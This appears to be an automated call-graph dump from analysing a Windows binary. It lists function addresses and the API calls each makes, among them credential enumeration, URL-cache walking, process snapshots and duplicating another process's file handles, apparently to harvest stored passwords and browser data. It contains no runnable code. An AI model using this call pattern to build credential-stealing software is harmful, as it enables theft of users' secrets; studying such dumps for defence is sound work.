4110f7 _wcsicmp 38155->38157 38156 411157 38158 40ada2 _wcsicmp 38156->38158 38157->38152 38157->38155 38312 410c46 10 API calls 38157->38312 38161 411167 38158->38161 38159 4111af 38161->38159 38162 4111a6 qsort 38161->38162 38162->38159 38165->37980 38167 40eb10 38166->38167 38180 40e8e0 38167->38180 38170 40eb6c memcpy memcpy 38171 40ebe1 38170->38171 38172 40ebb7 38170->38172 38171->38170 38173 40ebf2 ??2@YAPAXI ??2@YAPAXI 38171->38173 38172->38171 38174 40d134 16 API calls 38172->38174 38175 40ec2e ??2@YAPAXI 38173->38175 38178 40ec65 38173->38178 38174->38172 38175->38178 38190 40ea7f 38178->38190 38179 402f49 38179->37980 38181 40e8f2 38180->38181 38182 40e8eb ??3@YAXPAX 38180->38182 38183 40e900 38181->38183 38184 40e8f9 ??3@YAXPAX 38181->38184 38182->38181 38185 40e90a ??3@YAXPAX 38183->38185 38187 40e911 38183->38187 38184->38183 38185->38187 38186 40e931 ??2@YAPAXI ??2@YAPAXI 38186->38170 38187->38186 38188 40e921 ??3@YAXPAX 38187->38188 38189 40e92a ??3@YAXPAX 38187->38189 38188->38189 38189->38186 38191 40aa04 free 38190->38191 38192 40ea88 38191->38192 38193 40aa04 free 38192->38193 38194 40ea90 38193->38194 38195 40aa04 free 38194->38195 38196 40ea98 38195->38196 38197 40aa04 free 38196->38197 38198 40eaa0 38197->38198 38199 40a9ce 4 API calls 38198->38199 38200 40eab3 38199->38200 38201 40a9ce 4 API calls 38200->38201 38202 40eabd 38201->38202 38203 40a9ce 4 API calls 38202->38203 38204 40eac7 38203->38204 38205 40a9ce 4 API calls 38204->38205 38206 40ead1 38205->38206 38206->38179 38207->38138 38208->38142 38266 40b2cc 38209->38266 38211 402b0a 38212 40b2cc 27 API calls 38211->38212 38213 402b23 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402b3a 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402b54 38216->38217 38218 40b2cc 27 API calls 38217->38218 38219 402b6b 38218->38219 38220 40b2cc 27 API calls 38219->38220 38221 402b82 38220->38221 38222 40b2cc 27 API calls 38221->38222 38223 402b99 38222->38223 38224 40b2cc 27 API calls 38223->38224 38225 402bb0 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402bc7 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402bde 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402bf5 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402c0c 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402c23 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402c3a 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402c51 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402c68 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402c7f 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c99 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402cb3 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402cd5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402cf0 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402d0b 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402d26 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402d3e 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402d59 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402d78 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402d93 38262->38263 38264 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38263->38264 38264->38146 38265->38136 38269 40b58d 38266->38269 38268 40b2d1 38268->38211 38270 40b5a4 GetModuleHandleW FindResourceW 38269->38270 38271 40b62e 38269->38271 38272 40b5c2 LoadResource 38270->38272 38274 40b5e7 38270->38274 38271->38268 38273 40b5d0 SizeofResource LockResource 38272->38273 38272->38274 38273->38274 38274->38271 38282 40afcf 38274->38282 38276 40b608 memcpy 38285 40b4d3 memcpy 38276->38285 38278 40b61e 38286 40b3c1 18 API calls 38278->38286 38280 40b626 38287 40b04b 38280->38287 38283 40b04b ??3@YAXPAX 38282->38283 38284 40afd7 ??2@YAPAXI 38283->38284 38284->38276 38285->38278 38286->38280 38288 40b051 ??3@YAXPAX 38287->38288 38289 40b05f 38287->38289 38288->38289 38289->38271 38290->38154 38292 444a64 FreeLibrary 38291->38292 38293 444a83 38291->38293 38292->38293 38293->38156 38295 4032c4 38294->38295 38296 40b633 free 38295->38296 38297 403316 38296->38297 38313 44553b 38297->38313 38301 403480 38511 40368c 15 API calls 38301->38511 38303 403489 38304 40b633 free 38303->38304 38305 403495 38304->38305 38305->38156 38306 4033a9 memset memcpy 38307 4033ec wcscmp 38306->38307 38308 40333c 38306->38308 38307->38308 38308->38301 38308->38306 38308->38307 38509 4028e7 11 API calls 38308->38509 38510 40f508 6 API calls 38308->38510 38311 403421 _wcsicmp 38311->38308 38312->38157 38314 445548 38313->38314 38315 445599 38314->38315 38512 40c768 38314->38512 38316 4455a8 memset 38315->38316 38324 4457f2 38315->38324 38595 403988 38316->38595 38322 4455e5 38337 445672 38322->38337 38342 44560f 38322->38342 38327 445854 38324->38327 38698 403e2d memset memset memset memset memset 38324->38698 38325 4458bb memset memset 38329 414c2e 14 API calls 38325->38329 38371 4458aa 38327->38371 38721 403c9c memset memset memset memset memset 38327->38721 38328 44595e memset memset 38332 414c2e 14 API calls 38328->38332 38333 4458f9 38329->38333 38331 445a00 memset memset 38744 414c2e 38331->38744 38340 44599c 38332->38340 38341 40b2cc 27 API calls 38333->38341 38334 44558c 38579 444b06 38334->38579 38335 44557a 38335->38334 38791 4136c0 CoTaskMemFree 38335->38791 38606 403fbe memset memset memset memset memset 38337->38606 38350 40b2cc 27 API calls 38340->38350 38351 445909 38341->38351 38353 4087b3 337 API calls 38342->38353 38344 445bca 38352 445c8b memset memset 38344->38352 38408 445cf0 38344->38408 38345 445b38 memset memset memset 38356 445bd4 38345->38356 38357 445b98 38345->38357 38346 445849 38807 40b1ab free free 38346->38807 38365 4459ac 38350->38365 38362 409d1f 6 API calls 38351->38362 38366 414c2e 14 API calls 38352->38366 38363 445621 38353->38363 38354 445585 38792 41366b FreeLibrary 38354->38792 38355 44589f 38808 40b1ab free free 38355->38808 38360 414c2e 14 API calls 38356->38360 38357->38356 38368 445ba2 38357->38368 38358 40b2cc 27 API calls 38370 445a4f 38358->38370 38373 445be2 38360->38373 38361 403335 38508 4452e5 45 API calls 38361->38508 38376 445919 38362->38376 38793 4454bf 20 API calls 38363->38793 38364 445823 38364->38346 38386 4087b3 337 API calls 38364->38386 38377 409d1f 6 API calls 38365->38377 38378 445cc9 38366->38378 38878 4099c6 wcslen 38368->38878 38369 4456b2 38795 40b1ab free free 38369->38795 38757 409d1f wcslen wcslen 38370->38757 38371->38325 38405 44594a 38371->38405 38384 40b2cc 27 API calls 38373->38384 38374 445d3d 38404 40b2cc 27 API calls 38374->38404 38375 445d88 memset memset memset 38387 414c2e 14 API calls 38375->38387 38809 409b98 GetFileAttributesW 38376->38809 38388 4459bc 38377->38388 38389 409d1f 6 API calls 38378->38389 38379 445879 38379->38355 38390 4087b3 337 API calls 38379->38390 38381 445bb3 38881 445403 memset 38381->38881 38382 445680 38382->38369 38629 4087b3 memset 38382->38629 38393 445bf3 38384->38393 38386->38364 38396 445dde 38387->38396 38874 409b98 GetFileAttributesW 38388->38874 38398 445ce1 38389->38398 38390->38379 38403 409d1f 6 API calls 38393->38403 38394 445928 38394->38405 38810 40b6ef 38394->38810 38406 40b2cc 27 API calls 38396->38406 38898 409b98 GetFileAttributesW 38398->38898 38402 40b2cc 27 API calls 38410 445a94 38402->38410 38412 445c07 38403->38412 38413 445d54 _wcsicmp 38404->38413 38405->38328 38417 4459ed 38405->38417 38416 445def 38406->38416 38407 4459cb 38407->38417 38424 40b6ef 249 API calls 38407->38424 38408->38361 38408->38374 38408->38375 38409 445389 255 API calls 38409->38344 38762 40ae18 38410->38762 38411 44566d 38411->38324 38680 413d4c 38411->38680 38420 445389 255 API calls 38412->38420 38421 445d71 38413->38421 38485 445d67 38413->38485 38415 445665 38794 40b1ab free free 38415->38794 38422 409d1f 6 API calls 38416->38422 38417->38331 38458 445b22 38417->38458 38426 445c17 38420->38426 38899 445093 23 API calls 38421->38899 38429 445e03 38422->38429 38424->38417 38425 4456d8 38431 40b2cc 27 API calls 38425->38431 38432 40b2cc 27 API calls 38426->38432 38428 44563c 38428->38415 38434 4087b3 337 API calls 38428->38434 38900 409b98 GetFileAttributesW 38429->38900 38430 40b6ef 249 API calls 38430->38361 38436 4456e2 38431->38436 38437 445c23 38432->38437 38433 445d83 38433->38361 38434->38428 38796 413fa6 _wcsicmp _wcsicmp 38436->38796 38441 409d1f 6 API calls 38437->38441 38439 445e12 38446 445e6b 38439->38446 38453 40b2cc 27 API calls 38439->38453 38444 445c37 38441->38444 38442 445aa1 38445 445b17 38442->38445 38462 445ab2 memset 38442->38462 38476 409d1f 6 API calls 38442->38476 38769 40add4 38442->38769 38774 445389 38442->38774 38783 40ae51 38442->38783 38443 4456eb 38449 4456fd memset memset memset memset 38443->38449 38450 4457ea 38443->38450 38451 445389 255 API calls 38444->38451 38875 40aebe 38445->38875 38902 445093 23 API calls 38446->38902 38797 409c70 wcscpy wcsrchr 38449->38797 38800 413d29 38450->38800 38457 445c47 38451->38457 38459 445e33 38453->38459 38455 445e7e 38461 445f67 38455->38461 38464 40b2cc 27 API calls 38457->38464 38458->38344 38458->38345 38460 409d1f 6 API calls 38459->38460 38465 445e47 38460->38465 38466 40b2cc 27 API calls 38461->38466 38467 40b2cc 27 API calls 38462->38467 38469 445c53 38464->38469 38901 409b98 GetFileAttributesW 38465->38901 38471 445f73 38466->38471 38467->38442 38468 409c70 2 API calls 38472 44577e 38468->38472 38473 409d1f 6 API calls 38469->38473 38475 409d1f 6 API calls 38471->38475 38477 409c70 2 API calls 38472->38477 38478 445c67 38473->38478 38474 445e56 38474->38446 38482 445e83 memset 38474->38482 38479 445f87 38475->38479 38476->38442 38480 44578d 38477->38480 38481 445389 255 API calls 38478->38481 38905 409b98 GetFileAttributesW 38479->38905 38480->38450 38487 40b2cc 27 API calls 38480->38487 38481->38344 38486 40b2cc 27 API calls 38482->38486 38485->38361 38485->38430 38488 445eab 38486->38488 38489 4457a8 38487->38489 38490 409d1f 6 API calls 38488->38490 38491 409d1f 6 API calls 38489->38491 38492 445ebf 38490->38492 38493 4457b8 38491->38493 38494 40ae18 9 API calls 38492->38494 38799 409b98 GetFileAttributesW 38493->38799 38504 445ef5 38494->38504 38496 4457c7 38496->38450 38497 4087b3 337 API calls 38496->38497 38497->38450 38498 40ae51 9 API calls 38498->38504 38499 445f5c 38500 40aebe FindClose 38499->38500 38500->38461 38501 40add4 2 API calls 38501->38504 38502 40b2cc 27 API calls 38502->38504 38503 409d1f 6 API calls 38503->38504 38504->38498 38504->38499 38504->38501 38504->38502 38504->38503 38506 445f3a 38504->38506 38903 409b98 GetFileAttributesW 38504->38903 38904 445093 23 API calls 38506->38904 38508->38308 38509->38311 38510->38308 38511->38303 38513 40c775 38512->38513 38906 40b1ab free free 38513->38906 38515 40c788 38907 40b1ab free free 38515->38907 38517 40c790 38908 40b1ab free free 38517->38908 38519 40c798 38520 40aa04 free 38519->38520 38521 40c7a0 38520->38521 38909 40c274 memset 38521->38909 38526 40a8ab 9 API calls 38527 40c7c3 38526->38527 38528 40a8ab 9 API calls 38527->38528 38529 40c7d0 38528->38529 38938 40c3c3 38529->38938 38533 40c7e5 38534 40c877 38533->38534 38535 40c86c 38533->38535 38961 40a706 wcslen memcpy 38533->38961 38963 40c634 49 API calls 38533->38963 38542 40bdb0 38534->38542 38964 4053fe 39 API calls 38535->38964 38538 40c813 _wcslwr 38962 40c634 49 API calls 38538->38962 38540 40c829 wcslen 38540->38533 39149 404363 38542->39149 38545 40bf5d 39169 40440c 38545->39169 38547 40bdee 38547->38545 38550 40b2cc 27 API calls 38547->38550 38548 40bddf CredEnumerateW 38548->38547 38551 40be02 wcslen 38550->38551 38551->38545 38558 40be1e 38551->38558 38552 40be26 wcsncmp 38552->38558 38555 40be7d memset 38556 40bea7 memcpy 38555->38556 38555->38558 38557 40bf11 wcschr 38556->38557 38556->38558 38557->38558 38558->38545 38558->38552 38558->38555 38558->38556 38558->38557 38559 40b2cc 27 API calls 38558->38559 38561 40bf43 LocalFree 38558->38561 39172 40bd5d 28 API calls 38558->39172 39173 404423 38558->39173 38560 40bef6 _wcsnicmp 38559->38560 38560->38557 38560->38558 38561->38558 38562 4135f7 39186 4135e0 38562->39186 38565 40b2cc 27 API calls 38566 41360d 38565->38566 38567 40a804 8 API calls 38566->38567 38568 413613 38567->38568 38569 41361b 38568->38569 38570 41363e 38568->38570 38572 40b273 27 API calls 38569->38572 38571 4135e0 FreeLibrary 38570->38571 38573 413643 38571->38573 38574 413625 GetProcAddress 38572->38574 38573->38335 38574->38570 38575 413648 38574->38575 38576 413658 38575->38576 38577 4135e0 FreeLibrary 38575->38577 38576->38335 38578 413666 38577->38578 38578->38335 39189 4449b9 38579->39189 38582 444c1f 38582->38315 38583 4449b9 42 API calls 38585 444b4b 38583->38585 38584 444c15 38586 4449b9 42 API calls 38584->38586 38585->38584 39210 444972 GetVersionExW 38585->39210 38586->38582 38588 444b99 memcmp 38593 444b8c 38588->38593 38589 444c0b 39214 444a85 42 API calls 38589->39214 38593->38588 38593->38589 39211 444aa5 42 API calls 38593->39211 39212 40a7a0 GetVersionExW 38593->39212 39213 444a85 42 API calls 38593->39213 38596 40399d 38595->38596 39215 403a16 38596->39215 38598 403a09 39229 40b1ab free free 38598->39229 38600 4039a3 38600->38598 38604 4039f4 38600->38604 39226 40a02c CreateFileW 38600->39226 38601 403a12 wcsrchr 38601->38322 38604->38598 38605 4099c6 2 API calls 38604->38605 38605->38598 38607 414c2e 14 API calls 38606->38607 38608 404048 38607->38608 38609 414c2e 14 API calls 38608->38609 38610 404056 38609->38610 38611 409d1f 6 API calls 38610->38611 38612 404073 38611->38612 38613 409d1f 6 API calls 38612->38613 38614 40408e 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4040a6 38615->38616 38617 403af5 20 API calls 38616->38617 38618 4040ba 38617->38618 38619 403af5 20 API calls 38618->38619 38620 4040cb 38619->38620 39256 40414f memset 38620->39256 38622 4040e0 38623 404140 38622->38623 38625 4040ec memset 38622->38625 38627 4099c6 2 API calls 38622->38627 38628 40a8ab 9 API calls 38622->38628 39270 40b1ab free free 38623->39270 38625->38622 38626 404148 38626->38382 38627->38622 38628->38622 39283 40a6e6 WideCharToMultiByte 38629->39283 38631 4087ed 39284 4095d9 memset 38631->39284 38634 408809 memset memset memset memset memset 38635 40b2cc 27 API calls 38634->38635 38636 4088a1 38635->38636 38637 409d1f 6 API calls 38636->38637 38638 4088b1 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 4088c0 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 4088d0 38641->38642 38643 40b2cc 27 API calls 38642->38643 38644 4088df 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088ef 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088fe 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 40890e 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 40891d 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 40892d 38653->38654 39303 409b98 GetFileAttributesW 38654->39303 38656 40893e 38657 408943 38656->38657 38658 408958 38656->38658 39304 407fdf 75 API calls 38657->39304 39305 409b98 GetFileAttributesW 38658->39305 38661 408964 38662 408969 38661->38662 38663 40897b 38661->38663 39306 4082c7 198 API calls 38662->39306 39307 409b98 GetFileAttributesW 38663->39307 38666 408987 38667 4089a1 38666->38667 38668 40898c 38666->38668 39309 409b98 GetFileAttributesW 38667->39309 39308 408560 29 API calls 38668->39308 38678 408953 38678->38382 38681 40b633 free 38680->38681 38682 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38681->38682 38683 413f00 Process32NextW 38682->38683 38684 413da5 OpenProcess 38683->38684 38685 413f17 CloseHandle 38683->38685 38686 413df3 memset 38684->38686 38690 413eb0 38684->38690 38685->38425 39573 413f27 38686->39573 38688 413ec8 38688->38690 39600 4099f4 malloc memcpy free 38688->39600 38689 413ebf free 38689->38690 38690->38683 38690->38688 38690->38689 38692 413e37 GetModuleHandleW 38694 413e46 GetProcAddress 38692->38694 38695 413e1f 38692->38695 38694->38695 38695->38692 39578 413959 38695->39578 39594 413ca4 38695->39594 38697 413ea2 CloseHandle 38697->38690 38699 414c2e 14 API calls 38698->38699 38700 403eb7 38699->38700 38701 414c2e 14 API calls 38700->38701 38702 403ec5 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403ee2 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403efd 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403f15 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403f29 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403f3a 38711->38712 38713 40414f 33 API calls 38712->38713 38714 403f4f 38713->38714 38715 403faf 38714->38715 38717 403f5b memset 38714->38717 38719 4099c6 2 API calls 38714->38719 38720 40a8ab 9 API calls 38714->38720 39609 40b1ab free free 38715->39609 38717->38714 38718 403fb7 38718->38364 38719->38714 38720->38714 38722 414c2e 14 API calls 38721->38722 38723 403d26 38722->38723 38724 414c2e 14 API calls 38723->38724 38725 403d34 38724->38725 38726 409d1f 6 API calls 38725->38726 38727 403d51 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 403d6c 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d84 38730->38731 38732 403af5 20 API calls 38731->38732 38733 403d98 38732->38733 38734 403af5 20 API calls 38733->38734 38735 403da9 38734->38735 38736 40414f 33 API calls 38735->38736 38742 403dbe 38736->38742 38737 403e1e 39610 40b1ab free free 38737->39610 38738 403dca memset 38738->38742 38740 403e26 38740->38379 38741 4099c6 2 API calls 38741->38742 38742->38737 38742->38738 38742->38741 38743 40a8ab 9 API calls 38742->38743 38743->38742 38745 414b81 9 API calls 38744->38745 38746 414c40 38745->38746 38747 414c73 memset 38746->38747 39611 409cea 38746->39611 38751 414c94 38747->38751 38750 414c64 38750->38358 38752 414cf4 wcscpy 38751->38752 39614 414bb0 wcscpy 38751->39614 38752->38750 38754 414cd2 39615 4145ac RegQueryValueExW 38754->39615 38756 414ce9 38756->38752 38758 409d43 wcscpy 38757->38758 38760 409d62 38757->38760 38759 409719 2 API calls 38758->38759 38761 409d51 wcscat 38759->38761 38760->38402 38761->38760 38763 40aebe FindClose 38762->38763 38764 40ae21 38763->38764 38765 4099c6 2 API calls 38764->38765 38766 40ae35 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 40ae49 38767->38768 38768->38442 38770 40ade0 38769->38770 38771 40ae0f 38769->38771 38770->38771 38772 40ade7 wcscmp 38770->38772 38771->38442 38772->38771 38773 40adfe wcscmp 38772->38773 38773->38771 38775 40ae18 9 API calls 38774->38775 38777 4453c4 38775->38777 38776 40ae51 9 API calls 38776->38777 38777->38776 38778 4453f3 38777->38778 38779 40add4 2 API calls 38777->38779 38782 445403 250 API calls 38777->38782 38780 40aebe FindClose 38778->38780 38779->38777 38781 4453fe 38780->38781 38781->38442 38782->38777 38784 40ae7b FindNextFileW 38783->38784 38785 40ae5c FindFirstFileW 38783->38785 38786 40ae94 38784->38786 38787 40ae8f 38784->38787 38785->38786 38789 40aeb6 38786->38789 38790 409d1f 6 API calls 38786->38790 38788 40aebe FindClose 38787->38788 38788->38786 38789->38442 38790->38789 38791->38354 38792->38334 38793->38428 38794->38411 38795->38411 38796->38443 38798 409c89 38797->38798 38798->38468 38799->38496 38801 413d39 38800->38801 38802 413d2f FreeLibrary 38800->38802 38803 40b633 free 38801->38803 38802->38801 38804 413d42 38803->38804 38805 40b633 free 38804->38805 38806 413d4a 38805->38806 38806->38324 38807->38327 38808->38371 38809->38394 38811 44db70 38810->38811 38812 40b6fc memset 38811->38812 38813 409c70 2 API calls 38812->38813 38814 40b732 wcsrchr 38813->38814 38815 40b743 38814->38815 38816 40b746 memset 38814->38816 38815->38816 38817 40b2cc 27 API calls 38816->38817 38818 40b76f 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 40b783 38819->38820 39616 409b98 GetFileAttributesW 38820->39616 38822 40b792 38823 40b7c2 38822->38823 38825 409c70 2 API calls 38822->38825 39617 40bb98 38823->39617 38827 40b7a5 38825->38827 38830 40b2cc 27 API calls 38827->38830 38828 40b837 CloseHandle 38833 40b83e memset 38828->38833 38829 40b817 39651 409a45 GetTempPathW 38829->39651 38831 40b7b2 38830->38831 38834 409d1f 6 API calls 38831->38834 39650 40a6e6 WideCharToMultiByte 38833->39650 38834->38823 38835 40b827 38835->38833 38837 40b866 38838 444432 120 API calls 38837->38838 38839 40b879 38838->38839 38840 40b273 27 API calls 38839->38840 38841 40bad5 38839->38841 38842 40b89a 38840->38842 38843 40b04b ??3@YAXPAX 38841->38843 38844 438552 133 API calls 38842->38844 38845 40baf3 38843->38845 38846 40b8a4 38844->38846 38845->38405 38847 40bacd 38846->38847 38849 4251c4 136 API calls 38846->38849 38848 443d90 110 API calls 38847->38848 38848->38841 38872 40b8b8 38849->38872 38850 40bac6 39663 424f26 122 API calls 38850->39663 38851 40b8bd memset 39654 425413 17 API calls 38851->39654 38854 425413 17 API calls 38854->38872 38857 40a71b MultiByteToWideChar 38857->38872 38858 40a734 MultiByteToWideChar 38858->38872 38861 40b9b5 memcmp 38861->38872 38862 4099c6 2 API calls 38862->38872 38863 404423 37 API calls 38863->38872 38866 4251c4 136 API calls 38866->38872 38867 40bb3e memset memcpy 39664 40a734 MultiByteToWideChar 38867->39664 38869 40bb88 LocalFree 38869->38872 38872->38850 38872->38851 38872->38854 38872->38857 38872->38858 38872->38861 38872->38862 38872->38863 38872->38866 38872->38867 38873 40ba5f memcmp 38872->38873 39655 4253ef 16 API calls 38872->39655 39656 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38872->39656 39657 4253af 17 API calls 38872->39657 39658 4253cf 17 API calls 38872->39658 39659 447280 memset 38872->39659 39660 447960 memset memcpy memcpy memcpy 38872->39660 39661 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38872->39661 39662 447920 memcpy memcpy memcpy 38872->39662 38873->38872 38874->38407 38876 40aed1 38875->38876 38877 40aec7 FindClose 38875->38877 38876->38458 38877->38876 38879 4099d7 38878->38879 38880 4099da memcpy 38878->38880 38879->38880 38880->38381 38882 40b2cc 27 API calls 38881->38882 38883 44543f 38882->38883 38884 409d1f 6 API calls 38883->38884 38885 44544f 38884->38885 39753 409b98 GetFileAttributesW 38885->39753 38887 44545e 38888 445476 38887->38888 38890 40b6ef 249 API calls 38887->38890 38889 40b2cc 27 API calls 38888->38889 38891 445482 38889->38891 38890->38888 38892 409d1f 6 API calls 38891->38892 38893 445492 38892->38893 39754 409b98 GetFileAttributesW 38893->39754 38895 4454a1 38896 4454b9 38895->38896 38897 40b6ef 249 API calls 38895->38897 38896->38409 38897->38896 38898->38408 38899->38433 38900->38439 38901->38474 38902->38455 38903->38504 38904->38504 38905->38485 38906->38515 38907->38517 38908->38519 38910 414c2e 14 API calls 38909->38910 38911 40c2ae 38910->38911 38965 40c1d3 38911->38965 38916 40c3be 38933 40a8ab 38916->38933 38917 40afcf 2 API calls 38918 40c2fd FindFirstUrlCacheEntryW 38917->38918 38919 40c3b6 38918->38919 38920 40c31e wcschr 38918->38920 38921 40b04b ??3@YAXPAX 38919->38921 38922 40c331 38920->38922 38923 40c35e FindNextUrlCacheEntryW 38920->38923 38921->38916 38925 40a8ab 9 API calls 38922->38925 38923->38920 38924 40c373 GetLastError 38923->38924 38926 40c3ad FindCloseUrlCache 38924->38926 38927 40c37e 38924->38927 38928 40c33e wcschr 38925->38928 38926->38919 38929 40afcf 2 API calls 38927->38929 38928->38923 38930 40c34f 38928->38930 38931 40c391 FindNextUrlCacheEntryW 38929->38931 38932 40a8ab 9 API calls 38930->38932 38931->38920 38931->38926 38932->38923 39081 40a97a 38933->39081 38936 40a8cc 38936->38526 39087 40b1ab free free 38938->39087 38940 40c3dd 38941 40b2cc 27 API calls 38940->38941 38942 40c3e7 38941->38942 38943 40c50e 38942->38943 38944 40c3ff 38942->38944 38958 405337 38943->38958 38945 40a9ce 4 API calls 38944->38945 38946 40c418 memset 38945->38946 39088 40aa1d 38946->39088 38949 40c471 38951 40c47a _wcsupr 38949->38951 38950 40c505 38950->38943 39090 40a8d0 7 API calls 38951->39090 38953 40c498 39091 40a8d0 7 API calls 38953->39091 38955 40c4ac memset 38956 40aa1d 38955->38956 38957 40c4e4 RegEnumValueW 38956->38957 38957->38950 38957->38951 39092 405220 38958->39092 38961->38538 38962->38540 38963->38533 38964->38534 38966 40ae18 9 API calls 38965->38966 38972 40c210 38966->38972 38967 40ae51 9 API calls 38967->38972 38968 40c264 38969 40aebe FindClose 38968->38969 38971 40c26f 38969->38971 38970 40add4 2 API calls 38970->38972 38977 40e5ed memset memset 38971->38977 38972->38967 38972->38968 38972->38970 38973 40c231 _wcsicmp 38972->38973 38974 40c1d3 34 API calls 38972->38974 38973->38972 38975 40c248 38973->38975 38974->38972 38990 40c084 21 API calls 38975->38990 38978 414c2e 14 API calls 38977->38978 38979 40e63f 38978->38979 38980 409d1f 6 API calls 38979->38980 38981 40e658 38980->38981 38991 409b98 GetFileAttributesW 38981->38991 38983 40e667 38984 409d1f 6 API calls 38983->38984 38986 40e680 38983->38986 38984->38986 38992 409b98 GetFileAttributesW 38986->38992 38987 40e68f 38988 40c2d8 38987->38988 38993 40e4b2 38987->38993 38988->38916 38988->38917 38990->38972 38991->38983 38992->38987 39014 40e01e 38993->39014 38995 40e593 38996 40e5b0 38995->38996 38997 40e59c DeleteFileW 38995->38997 38998 40b04b ??3@YAXPAX 38996->38998 38997->38996 39000 40e5bb 38998->39000 38999 40e521 38999->38995 39037 40e175 38999->39037 39002 40e5c4 CloseHandle 39000->39002 39003 40e5cc 39000->39003 39002->39003 39005 40b633 free 39003->39005 39004 40e573 39007 40e584 39004->39007 39008 40e57c CloseHandle 39004->39008 39006 40e5db 39005->39006 39010 40b633 free 39006->39010 39080 40b1ab free free 39007->39080 39008->39007 39009 40e540 39009->39004 39057 40e2ab 39009->39057 39012 40e5e3 39010->39012 39012->38988 39015 406214 22 API calls 39014->39015 39016 40e03c 39015->39016 39017 40e16b 39016->39017 39018 40dd85 74 API calls 39016->39018 39017->38999 39019 40e06b 39018->39019 39019->39017 39020 40afcf ??2@YAPAXI ??3@YAXPAX 39019->39020 39021 40e08d OpenProcess 39020->39021 39022 40e0a4 GetCurrentProcess DuplicateHandle 39021->39022 39026 40e152 39021->39026 39023 40e0d0 GetFileSize 39022->39023 39024 40e14a CloseHandle 39022->39024 39027 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39023->39027 39024->39026 39025 40e160 39029 40b04b ??3@YAXPAX 39025->39029 39026->39025 39028 406214 22 API calls 39026->39028 39030 40e0ea 39027->39030 39028->39025 39029->39017 39031 4096dc CreateFileW 39030->39031 39032 40e0f1 CreateFileMappingW 39031->39032 39033 40e140 CloseHandle CloseHandle 39032->39033 39034 40e10b MapViewOfFile 39032->39034 39033->39024 39035 40e13b CloseHandle 39034->39035 39036 40e11f WriteFile UnmapViewOfFile 39034->39036 39035->39033 39036->39035 39038 40e18c 39037->39038 39039 406b90 11 API calls 39038->39039 39040 40e19f 39039->39040 39041 40e1a7 memset 39040->39041 39042 40e299 39040->39042 39047 40e1e8 39041->39047 39043 4069a3 ??3@YAXPAX free 39042->39043 39044 40e2a4 39043->39044 39044->39009 39045 406e8f 13 API calls 39045->39047 39046 406b53 SetFilePointerEx ReadFile 39046->39047 39047->39045 39047->39046 39048 40dd50 _wcsicmp 39047->39048 39049 40e283 39047->39049 39053 40742e 8 API calls 39047->39053 39054 40aae3 wcslen wcslen _memicmp 39047->39054 39055 40e244 _snwprintf 39047->39055 39048->39047 39050 40e291 39049->39050 39051 40e288 free 39049->39051 39052 40aa04 free 39050->39052 39051->39050 39052->39042 39053->39047 39054->39047 39056 40a8d0 7 API calls 39055->39056 39056->39047 39058 40e2c2 39057->39058 39059 406b90 11 API calls 39058->39059 39070 40e2d3 39059->39070 39060 40e4a0 39061 4069a3 ??3@YAXPAX free 39060->39061 39063 40e4ab 39061->39063 39062 406e8f 13 API calls 39062->39070 39063->39009 39064 406b53 SetFilePointerEx ReadFile 39064->39070 39065 40e489 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068 40dd50 _wcsicmp 39068->39070 39069->39060 39070->39060 39070->39062 39070->39064 39070->39065 39070->39068 39071 40dd50 _wcsicmp 39070->39071 39074 40742e 8 API calls 39070->39074 39075 40e3e0 memcpy 39070->39075 39076 40e3fb memcpy 39070->39076 39077 40e3b3 wcschr 39070->39077 39078 40e416 memcpy 39070->39078 39079 40e431 memcpy 39070->39079 39072 40e376 memset 39071->39072 39073 40aa29 6 API calls 39072->39073 39073->39070 39074->39070 39075->39070 39076->39070 39077->39070 39078->39070 39079->39070 39080->38995 39082 40a980 39081->39082 39083 40a995 _wcsicmp 39082->39083 39084 40a99c wcscmp 39082->39084 39085 40a8bb 39082->39085 39083->39082 39084->39082 39085->38936 39086 40a8d0 7 API calls 39085->39086 39086->38936 39087->38940 39089 40aa23 RegEnumValueW 39088->39089 39089->38949 39089->38950 39090->38953 39091->38955 39093 405335 39092->39093 39094 40522a 39092->39094 39093->38533 39095 40b2cc 27 API calls 